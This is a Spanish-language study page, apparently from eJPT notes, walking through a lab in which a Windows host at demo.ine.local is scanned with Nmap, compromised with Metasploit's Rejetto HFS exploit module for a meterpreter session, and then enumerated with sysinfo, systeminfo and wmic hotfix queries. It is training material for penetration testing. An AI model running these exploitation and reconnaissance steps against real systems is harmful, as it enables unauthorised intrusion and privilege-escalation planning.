> For the complete documentation index, see [llms.txt](https://4lec4st.gitbook.io/4lec4st/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://4lec4st.gitbook.io/4lec4st/ejpt-notes/pruebas-de-penetracion-de-host-y-red/post-explotacion/enumeracion-de-windows/enumeracion-de-la-informacion-del-sistema-windows.md).

# Enumeración de la información del sistema - Windows

Una vez obtenida una **sesión inicial** en un sistema comprometido, uno de los primeros pasos fundamentales es **recolectar información detallada del sistema operativo**. Esta etapa es crítica para **evaluar posibles vectores de escalada de privilegios**, seleccionar exploits compatibles y comprender el entorno en el que nos encontramos.

***

## 🎯 ¿Qué tipo de información debemos recolectar?

Los siguientes datos son esenciales:

* 🖥️ **Hostname** – Identificador único del equipo dentro de la red.
* 🧩 **Nombre del sistema operativo** – Ej: Windows 7, Windows Server 2016, etc.
* 🔢 **Versión del sistema operativo y Service Pack** – Ej: Windows 7 SP1 (Build 7601).
* 🧠 **Arquitectura del sistema** – Determina si es una máquina de 32 bits (x86) o 64 bits (x64).
* 🔒 **Hotfixes o actualizaciones instaladas** – Pueden indicar si el sistema está parcheado contra ciertas vulnerabilidades conocidas.

***

## 🛠️ ¿Por qué es importante?

Recolectar esta información nos permite:

* 📌 **Filtrar exploits disponibles** compatibles con el sistema y su versión.
* 🧰 **Escoger herramientas apropiadas** (algunas requieren arquitectura específica).
* 🔐 **Identificar debilidades potenciales** en sistemas sin parches de seguridad aplicados.
* 🕵️‍♂️ **Entender el rol del sistema dentro de la red** (estación de trabajo, controlador de dominio, servidor de archivos, etc.).

***

## 🧪 Laboratorio Práctico

**Paso 1:** Abra el enlace del laboratorio para acceder a la máquina Kali.

<figure><img src="/files/nqy0kLKsp7658U5fAc6U" alt=""><figcaption></figcaption></figure>

**Paso 2:** Verifique si la máquina de destino es accesible:

**Dominio:**

```
ping -c 4 demo.ine.local
```

<figure><img src="/files/GYOu4thofl6JMe8PIaQX" alt=""><figcaption></figcaption></figure>

El objetivo es alcanzable.

**Paso 3:** Escaneo de puertos con Nmap

Antes de que podamos comenzar a realizar la enumeración local, necesitaremos obtener acceso al sistema de destino.

Para empezar, necesitaremos identificar un servicio vulnerable que se esté ejecutando en el sistema de destino Windows, esto se puede hacer realizando un escaneo de detección de versión de servicio con Nmap.

**Dominio:**

```
nmap -sV demo.ine.local
```

Como se muestra en la siguiente captura de pantalla, el escaneo de Nmap revela que hay un servidor web ejecutándose en el puerto 80.

<figure><img src="/files/7qHmXVUkw3N3yvhMk5Tw" alt=""><figcaption></figcaption></figure>

**Paso 4:** Búsqueda de exploits con Searchsploit

El escaneo de Nmap reveló que el puerto 80 está ejecutando **Rejetto HTTP File Server 2.3** , podemos buscar exploits que afecten a esta versión de **Rejetto HTTP File Server** con una herramienta como Searchsploit ejecutando el siguiente comando:

**Dominio:**

```
searchsploit rejetto
```

Como se muestra en la siguiente captura de pantalla, Searchsploit revela que hay un módulo de explotación de Metasploit Framework que se puede utilizar para explotar esta versión específica del **servidor de archivos HTTP Rejetto** .

<figure><img src="/files/944caCOzV5ifYw50t9A9" alt=""><figcaption></figcaption></figure>

**Paso 5:** Obtener acceso

Para utilizar este módulo de exploit, necesitaremos iniciar la Consola Metasploit Framework (msfconsole), esto se puede hacer ejecutando el siguiente comando:

**Dominio:**

```
msfconsole
```

Después de iniciar **msfconsole** , podemos cargar el módulo ejecutando el siguiente comando:

**Dominio:**

```
use exploit/windows/http/rejetto_hfs_exec
```

Ahora tendremos que configurar las opciones del módulo; más específicamente, establecer la dirección de destino. Esto se puede hacer ejecutando el siguiente comando:

**Dominio:**

```
set RHOSTS demo.ine.local
```

Después de configurar las opciones del módulo, podemos ejecutar el módulo de exploit ejecutando el siguiente comando:

**Dominio:**

```
exploit
```

Como se muestra en la siguiente captura de pantalla, el módulo de explotación se ejecuta con éxito y nos proporciona una sesión **de meterpreter** en el sistema de destino.

<figure><img src="/files/4pjKpwifx5XPDTZBpJNJ" alt=""><figcaption></figcaption></figure>

Ahora que hemos obtenido acceso al sistema de destino de Windows, podemos comenzar a enumerar la información del sistema local.

**Paso 6:** Enumeración de la información del sistema

Para empezar, la información más importante que debe obtenerse es el sistema operativo del sistema de destino. Esto puede hacerse ejecutando el siguiente comando meterpreter:

**Dominio:**

```
sysinfo
```

Como se muestra en la siguiente captura de pantalla, el comando **sysinfo** revela que el sistema de destino está ejecutando **Windows Server 2012 R2** .

<figure><img src="/files/CNwozn4d7JrW2jMM3Osy" alt=""><figcaption></figcaption></figure>

El comando sysinfo también nos proporciona información como el nombre de host, la arquitectura del sistema operativo y el dominio del que forma parte el sistema de destino.

También podemos enumerar el nombre de host del sistema generando una sesión de shell nativa en el sistema de destino, esto se puede hacer ejecutando los siguientes comandos:

**Dominio:**

```
shell
```

**Dominio:**

```
hostname
```

<figure><img src="/files/dc1plSZRCQEPHFuwf12P" alt=""><figcaption></figcaption></figure>

Para obtener información completa sobre el sistema de destino, podemos ejecutar el siguiente comando:

**Dominio:**

```
systeminfo
```

Como se muestra en las siguientes capturas de pantalla, este comando le proporcionará información importante como la versión de Windows que se ejecuta en el destino, el número de compilación del sistema operativo, la configuración del hardware y, lo más importante, las revisiones de Windows instaladas en el sistema de destino.

<figure><img src="/files/Z6Zhcr6smwpq8546Kuzc" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/DCeAMJPoNNeEzn86KraR" alt=""><figcaption></figcaption></figure>

Si bien el comando **systeminfo** nos proporciona una lista de actualizaciones instaladas en forma de sus ID de HotFix, también podemos obtener una lista de actualizaciones instaladas en el sistema con información más detallada, como cuándo se instaló la actualización, ejecutando el siguiente comando:

**Dominio:**

```
wmic qfe get Caption,Description,HotFixID,InstalledOn
```

<figure><img src="/files/7Zeun6vvGAFp9co0Wu4R" alt=""><figcaption></figcaption></figure>

Esta información es muy útil ya que nos proporciona una idea de qué versión específica de Windows se está ejecutando en el objetivo y las actualizaciones que se han instalado en el sistema de destino.

¿Por qué es importante? Desde la perspectiva de un evaluador de penetración, podemos usar esta información para identificar si la versión específica de Windows que se ejecuta en el objetivo es vulnerable a exploits que nos permitan elevar nuestros privilegios o realizar movimientos laterales.

#### Conclusión

En este laboratorio, exploramos el proceso de enumeración de información del sistema, como la versión específica del sistema operativo y las actualizaciones instaladas en un destino Windows.
